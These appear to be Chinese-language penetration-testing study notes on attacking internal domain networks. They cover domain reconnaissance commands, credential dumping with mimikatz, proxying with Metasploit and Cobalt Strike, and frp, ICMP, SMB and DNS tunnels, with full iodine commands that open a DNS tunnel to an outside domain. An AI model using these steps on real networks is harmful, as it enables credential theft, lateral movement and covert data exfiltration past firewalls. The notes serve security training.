内网前期准备小结_内网开发需要提前准备什么

域产生原因

简单来说就是为了安全和方便控制域内主机

内外网隔离后，内网安全性大大提升
一个具有一定规模的企业，每天都可能面临员工入职和离职，因此网络管理部门经常需要对域成员主机进行格式化消除磁盘的文件，然后重装系统及软件，以提供给新员工使用；因此，为了便于后期交接，大多网络管理员会做好一个系统镜像盘，统一安装所有的电 脑，并且在安装的时候设置惯用、甚至统一的密码。

域信息收集

net view /domain 查询域列表
net time /domain 从域控查询时间，会返回域控主机名，ping一下获取其ip
net user /domain 查询域用户
ipconfig /all 判断存在域
systeminfo 详细信息
netstat -ano 端口列表
tasklist 进程列表
route print 路由表

工具：Adfind BloodHound fscan 
提权后cs端口扫描135

密码&凭据&口令等

收集各种密文，明文，口令等，为后续横向渗透做好测试准备
计算机用户 明文，HASH获取-mimikatz(win)，CS 插件

代理&隧道技术

代理：解决外网内网无法通讯问题
隧道：解决协议不出网，如不支持tcp协议

代理
msf auxiliary/server/socks_proxy，viper
cs 代理转发-Socks 代理

代理软件：Proxifier ProxyChains

隧道
frp隧道 tcp, udp, http, https
icmp pingtunnel
ssh隧道

SMB 隧道
判断：445 端口开放
通讯：直接 SMB 协议通讯即可

DNS 隧道
dns 区域传输 tcp 域名解析 udp
判断：nslookup dig
1、上线环境：内网主机只出网 DNS 协议数据，解决上线
-域名申请及配置
-监听器创建及配置
-后门绑定监听器及生成
2、通讯环境：
内网主机只出网 DNS 协议数据，解决通讯
https://github.com/yarrick/iodine
判断出网：nslookup www.baidu.com
-服务器：设置密码 xiaodi 并创建虚拟 IP 及绑定域名指向
iodined -f -c -P xiaodi 192.168.0.1 ns1.xiaodi8.com -DD
设置密码 xiaodi 并创建虚拟 IP 及绑定域名指向
-客户端：连接密码 xiaodi 并绑定域名指向
iodine -f -M 200 -P xiaodi ns1.xiaodi8.com
-尝试通讯尝试连接：
ssh root@192.168.0.2

后门上线

cs
正向连接 选beacon tcp
反向连接 转发上线
msf
run autoroute -p //查看当前路由表
run post/multi/manage/autoroute //添加当前路由表
内网上线，内网攻击模块要正向连接 set payload

正向连接还是反向连接看防火墙策略
windows防火墙常用命令 - 苍山落暮 - 博客园 (cnblogs.com)